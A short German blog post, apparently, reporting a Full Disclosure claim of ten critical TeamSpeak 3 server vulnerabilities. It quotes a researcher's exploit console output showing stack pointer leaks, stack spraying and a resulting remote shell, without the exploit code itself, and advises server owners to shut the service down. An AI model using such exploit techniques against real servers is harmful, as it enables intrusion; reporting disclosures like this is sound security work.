Wie Hanz Jenson auf der Mailingliste Fulldisclosure berichtet/behauptet, hat er 10 kritische Sicherheitslücken gefunden. Eine davon kann genutzt werden um den Server komplett zu übernehmen.
Der Autor will/hat bereits einen funktionierenden Exploit geschrieben/haben:
Here's the output of an exploit which uses two of the vulnerabilities:
$ python exploit_teamspeak.py
leaking distinct stack pointers
'\xa2' '\x9a' '\x8a' . '_' .. '\xa0'
got a ptr: 0x7fa29a8a5fa0
'\xa2' '\x9a' '\x9a' 'o' ... '\xa0'
got a ptr: 0x7fa29a9a6fa0
'\xa2' '\x9a' '\xaa' . '\x7f' '\xa0'
got a ptr: 0x7fa29aaa7fa0
stack ptr: 0x7fa29a8a5fa0
assumed stack base: 0x7fa29a5a5000
sleeping a bit to avoid flood detection.......
initializing stack sprayers............
spraying the stacks............
doing some magic.....
Got a shell from ('127.0.0.1', 38416)
ts3@ts3:/home/ts3/teamspeak3-server$Sollte TeamSpeak die Schwachstellen bestätigen, kann man TS3 Serverbesitzern nur raten den Dienst bis auf weiteres abzuschalten.
Auf Pastebin gibt es das Advisory zu nachlesen.
Pingback: Hanz Jenson Alias ???? – Marius's Welt